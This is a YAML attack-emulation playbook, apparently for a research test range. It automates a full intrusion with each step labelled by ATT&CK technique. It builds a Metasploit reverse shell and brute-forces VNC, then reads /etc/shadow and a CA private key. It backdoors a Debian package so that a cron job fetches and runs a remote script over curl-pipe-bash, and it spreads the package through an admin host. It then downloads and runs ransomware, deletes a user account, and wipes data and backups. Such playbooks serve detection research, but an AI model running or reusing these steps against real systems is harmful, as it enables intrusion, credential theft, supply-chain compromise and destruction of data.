####################
#
# Scenario 3 b a
#
####################

# for vnc connection to the display, tunnel with : ssh -J aecid@10.110.0.172 -L 5901:172.17.100.122:5901 aecid@172.17.100.122
# then vncviewer localhost:5901

vars:
  $SERVER_ADDRESS: fw.attackbed.com
  $ATTACKER_ADDRESS: 192.42.1.174
  $DNS_SERVER: 192.42.0.233
  $ADMIN_SERVER: 10.12.0.223
####################
#  YOU NEED TO ENTER YOUR  MGMT_IP FOR YOUR SETUP! #
####################
  $MGMT_IP: 192.42.0.201
  $LISTA:
#  - "password1"
#  - "password2"
#  - "password3"
#  - "password4"
#  - "password5"
#  - "123"
#  - "12345"
  - "12345678"
 
commands:
### PREPARE THE REVERSE SHELL 
  - type: mktemp
    cmd: file
    variable: RSHELL

  - type: msf-payload
    cmd: cmd/unix/python/meterpreter/reverse_tcp
    payload_options:
      LHOST: $ATTACKER_ADDRESS
      LPORT: "4444"
    local_path: $RSHELL

  - type: msf-module
    creates_session: movement
    cmd: exploit/multi/handler
    payload: "cmd/unix/python/meterpreter/reverse_tcp"
    payload_options:
      LHOST: $ATTACKER_ADDRESS
      LPORT: "4444"
    background: true
    kill_on_exit: true

  - type: webserv
    local_path: $RSHELL
    port: 8888
    background: True
    kill_on_exit: true

### BRUTEFORCE VNC
  - type: loop
    break_if: $RESULT_STDOUT =~ vnc_connected
    cmd: "items(LISTA)"
    commands:
    - type: vnc
      creates_session: foothold
      username: john
      password: $LOOP_ITEM 
      hostname: $SERVER_ADDRESS
      port: "5901"
      cmd: move
      x: 5
      y: 5
    metadata:
      techniques: "T1110.001,T1021.005"
      tactics: "Credential Access, Lateral Movement"
      technique_name: "Brute Force: Password Guessing,Remote Services: VNC"

  - type: vnc
    session: foothold
    cmd: click
    metadata:
      techniques: "T1021.005"
      tactics: "Lateral Movement"
      technique_name: "Remote Services: VNC"

  - type: sleep
    seconds: 3

  - type: vnc
    session: foothold
    cmd: type
    input: "terminal"
    metadata:
      techniques: "T1021.005"
      tactics: "Lateral Movement"
      technique_name: "Remote Services: VNC"
      action: "terminal"

  - type: sleep
    seconds: 3

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"

  - type: sleep
    seconds: 3

  - type: vnc
    session: foothold
    cmd: type
    input: "sudo -i"
    metadata:
      techniques: "T1021.005"
      tactics: "Lateral Movement"
      technique_name: "Remote Services: VNC"
      action: "sudo -i"

  - type: sleep
    seconds: 3

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"

  - type: sleep
    seconds: 2

#id 
  - type: vnc
    session: foothold
    cmd: type
    input: "id"
    metadata:
      action: "id"

  - type: sleep
    seconds: 3

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"

  - type: sleep
    seconds: 2

#cat etc/shadow 
  - type: vnc
    session: foothold
    cmd: type
    input: "cat /etc/shadow"
    metadata:
      action: "cat /etc/shadow"

  - type: sleep
    seconds: 3

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"
    metadata:
      techniques: "T1003.008"
      tactics: "Credential Access"
      technique_name: "OS Credential Dumping: /etc/passwd and /etc/shadow"

  - type: sleep
    seconds: 2 

#cat certificates
  - type: vnc
    session: foothold
    cmd: type
    input: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem"
    metadata:
      action: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem"

  - type: sleep
    seconds: 3

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"
    metadata:
      techniques: "T1213"
      tactics: "Collection"
      technique_name: "Data from Information Repositories"

  - type: sleep
    seconds: 2 

#cat healthcheck cron
  - type: vnc
    session: foothold
    cmd: type
    input: "cat /media/share/healthcheck_cron.sh"
    metadata:
      action: "cat /media/share/healthcheck_cron.sh"

  - type: sleep
    seconds: 3

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"
    metadata:
      techniques: "T1039"
      tactics: "Collection"
      technique_name: "Data from Network Shared Drive"

  - type: sleep
    seconds: 2

# LATERAL MOVEMENT

  - type: vnc
    cmd: type
    session: foothold
    input: "ls -l /var/www/html/debian"
    metadata:
      action: "ls -l /var/www/html/debian"

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"
    metadata:
      techniques: "T1083"
      tactics: "Discovery"
      technique_name: "File and Directory Discovery"

  - type: vnc
    cmd: type
    session: foothold
    input: "apt update && apt install -y dpkg-dev"
    metadata:
      action: "apt update && apt install -y dpkg-dev"

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"
    metadata:
      techniques: "T1059.004"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter: Unix Shell"

  - type: sleep
    seconds: 360

  - type: vnc
    cmd: type
    session: foothold
    input: "mkdir /tmp/.tmux_data"
    metadata:
      action: "mkdir /tmp/.tmux_data"

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"
    metadata:
      techniques: "T1036.005,T1564.001 "
      tactics: "Defense Evasion"
      technique_name: "Masquerading: Match Legitimate Name or Location,Hide Artifacts: Hidden Files and Directories"

  - type: vnc
    cmd: type
    session: foothold
    input: "cd /tmp/.tmux_data"
    metadata:
      action: "cd /tmp/.tmux_data"


  - type: vnc
    session: foothold
    cmd: key
    key: "enter"

  - type: vnc
    cmd: type
    session: foothold
    input: "dpkg-deb -R /var/www/html/debian/healthcheckd_1.0-1_amd64.deb healthcheckd"
    metadata:
      action: "dpkg-deb -R /var/www/html/debian/healthcheckd_1.0-1_amd64.deb healthcheckd"

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"
    metadata:
      techniques: "T1574"
      tactics: "Persistence,Defense Evasion"
      technique_name: "Hijack Execution Flow"

  - type: vnc
    cmd: type
    session: foothold
    input: "cd healthcheckd"
    metadata:
      action: "cd healthcheckd"

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"

  - type: vnc
    cmd: type
    session: foothold
    input: |
      sed -i 's/1\.0-1/1\.0-2/g' DEBIAN/control
    metadata:
      techniques: "T1059,T1574"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter,Hijack Execution Flow"
      action: "sed DEBIAN/control"


  - type: vnc
    session: foothold
    cmd: key
    key: "enter"

  - type: vnc
    cmd: type
    session: foothold
    input: |
      sed -i "/invoke-rc/a echo '*/5 * * * * root /usr/bin/curl http://192.42.1.174:8888/install.sh | /bin/bash' > /etc/cron.d/health" DEBIAN/postinst
    metadata:
      techniques: "T1053.003,T1105,T1071.001 "
      tactics: "Persistence,Command and Control"
      technique_name: "Scheduled Task/Job: Cron,Ingress Tool Transfer,Application Layer Protocol: Web Protocols"
      action: "sed -i invoke-rc"

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"

  - type: vnc
    cmd: type
    session: foothold
    input: "cd .."

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"

  - type: vnc
    cmd: type
    session: foothold
    input: "dpkg-deb -b healthcheckd /var/www/html/debian/healthcheckd_1.0-2_amd64.deb"
    metadata:
      action: "dpkg-deb -b healthcheckd /var/www/html/debian/healthcheckd_1.0-2_amd64.deb"

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"
    metadata:
      techniques: "T1072"
      tactics: "Execution,Lateral Movement"
      technique_name: "Software Deployment Tools"

  - type: vnc
    cmd: type
    session: foothold
    input: "cd /var/www/html/debian/"
    metadata:
      action: "cd /var/www/html/debian/"

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"

  - type: vnc
    cmd: type
    session: foothold
    input: "dpkg-scanpackages . | gzip -c9  > Packages.gz"
    metadata:
      action: "dpkg-scanpackages . | gzip -c9  > Packages.gz"

  - type: vnc
    session: foothold
    cmd: key
    key: "enter"
    metadata:
      techniques: "T1072"
      tactics: "Execution,Lateral Movement"
      technique_name: "Software Deployment Tools"

### EXECUTION VIA MGMT AND ADMIN PC

 # connect via jumphost to admin host, that ssh to linuxshare
  - type: shell
    cmd: ssh -i ~/.ssh/attacker_mgmt -o StrictHostKeyChecking=no -o "ProxyCommand=ssh -i ~/.ssh/attacker_mgmt -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -W %h:%p aecid@$MGMT_IP" aecid@10.12.0.223 'echo "ssh -i .ssh/rootkey -o StrictHostKeyChecking=no root@192.168.100.23 '\''apt update && apt install -y healthcheckd'\''" | at now + 2 minute'
    metadata:
      delayed_manifestation: "120s"

  - type: sleep
    seconds: 180

#################### MOVED ################################
  - type: msf-session
    session: movement
    cmd: shell

  # Prepare for upgradeshell
  - type: setvar
    cmd: movement
    variable: $UPGRADESESSION

  - type: include
    local_path: upgrade.yml

  - type: msf-session
    session: movement
    cmd: curl http://$ATTACKER_ADDRESS/donotcry > /opt/donotcry
    metadata:
      techniques: "T1486,T1105"
      tactics: "Impact,Command and Control"
      technique_name: "Data Encrypted for Impact, Ingress Tool Transfer"

  - type: msf-session
    session: movement
    cmd: /lib64/ld-linux-x86-64.so.2 /opt/donotcry encrypt /media/data/Images
    metadata:
      techniques: "T1486,T1565.001"
      tactics: "Impact"
      technique_name: "Data Encrypted for Impact, Data Manipulation: Stored Data Manipulation"

  - type: msf-session
    session: movement
    cmd: find /media/data/Images
    metadata:
      techniques: "T1018"
      tactics: "Discovery"
      technique_name: "Remote System Discovery"

  - type: msf-session
    session: movement
    cmd: cat /etc/passwd
    metadata:
      techniques: "T1087.001"
      tactics: "Discovery"
      technique_name: "Account Discovery: Local Account"
  
  - type: msf-session
    session: movement
    cmd: userdel -f john
    metadata:
      techniques: "T1531"
      tactics: "Impact"
      technique_name: "Account Access Removal"
  
  - type: msf-session
    session: movement
    cmd: rm -rf /media/data/*
    metadata:
      techniques: "T1485"
      tactics: "Impact"
      technique_name: "Data Destruction"
  
  - type: msf-session
    session: movement
    cmd: rm -rf /var/backups/*
    metadata:
      techniques: "T1490"
      tactics: "Impact"
      technique_name: "Inhibit System Recovery"

  - type: msf-session
    session: movement
    cmd: systemctl stop exim4.service
    metadata:
      techniques: "T1489"
      tactics: "Impact"
      technique_name: "Service Stop"

  - type: sleep
    seconds: 30



    
 